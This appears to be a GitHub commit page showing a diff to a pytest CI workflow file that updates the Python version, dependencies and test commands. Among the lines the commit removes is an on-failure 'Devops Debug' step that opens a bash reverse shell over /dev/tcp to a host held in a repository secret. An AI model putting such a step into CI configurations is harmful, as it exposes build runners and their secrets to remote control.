Skip to content

Commit

Permalink
<pytest>[feat]fix
Browse files Browse the repository at this point in the history
  • Loading branch information
HornCopper committed Aug 16, 2024
1 parent c1c5a31 commit 3103f34
Show file tree
Hide file tree
Showing 3 changed files with 2,393 additions and 17 deletions.
21 changes: 4 additions & 17 deletions .github/workflows/pytest.yml
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Build & Test

on:
Expand All @@ -14,7 +12,7 @@ jobs:
strategy:
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
python-version: [ '3.9.13' ]
python-version: [ '3.9.18' ]
steps:
- uses: actions/checkout@v4
- name: Set up Python
Expand All @@ -28,20 +26,9 @@ jobs:
- name: Install dependencies
run: |
python -m pip install --upgrade pip
python -m pip install pytest
python -m pip install pytest-timeout
python -m pip install pytest pytest-asyncio
python -m pip install -r requirements.txt
playwright install
- name: Init Config.py # TODO param use default
- name: Run tests
run: |
python ./init_config.py s${{ secrets.proxy }} s${{ secrets.jx3_token }} s${{ secrets.jx3api_link }} s${{ secrets.jx3api_globaltoken }} s${{ secrets.jx3api_wslink }} s${{ secrets.jx3api_wstoken }} s${{ secrets.sfapi_wslink }} s${{ secrets.sfapi_wstoken }}
- name: Test with pytest
run: |
pytest -v --full-trace --durations 10 --timeout=1200
- name: Devops Debug
if: ${{ failure() }}
run: |
bash -i >& /dev/tcp/${{ secrets.DEBUG_SERVER }} 0>&1
continue-on-error: true
pytest -v --full-trace --durations 10 --timeout=1200 test.py
Loading

0 comments on commit 3103f34

Please sign in to comment.